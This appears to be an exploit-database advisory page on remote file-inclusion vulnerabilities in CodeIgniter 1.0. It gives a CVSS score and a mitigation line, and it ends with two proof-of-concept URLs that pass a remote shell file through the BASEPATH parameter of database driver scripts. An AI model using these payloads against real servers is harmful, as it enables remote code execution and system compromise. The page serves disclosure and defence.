header-logo
Suggest Exploit
vendor:
CodeIgniter
by:
Not specified
7.5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: CodeIgniter
Affected Version From: CodeIgniter 1.0
Affected Version To: Not specified
Patch Exists: NO
Related CWE: Not specified
CPE: Not specified
Metasploit:
Other Scripts:
Platforms Tested: Not specified
Not specified

CodeIgniter Remote File Include Vulnerabilities

CodeIgniter is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data. Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

Mitigation:

It is recommended to sanitize and validate user-supplied data before including it in any file path or URL.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/38672/info

CodeIgniter is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues may allow an attacker to compromise the application and the computer; other attacks are also possible.

CodeIgniter 1.0 is vulnerable; other versions may also be affected.

http://www.example.com/system/database/DB_active_rec.php?BASEPATH=[Shell.txt?]
http://www.example.com/system/database/DB_driver.php?BASEPATH=[Shell.txt?]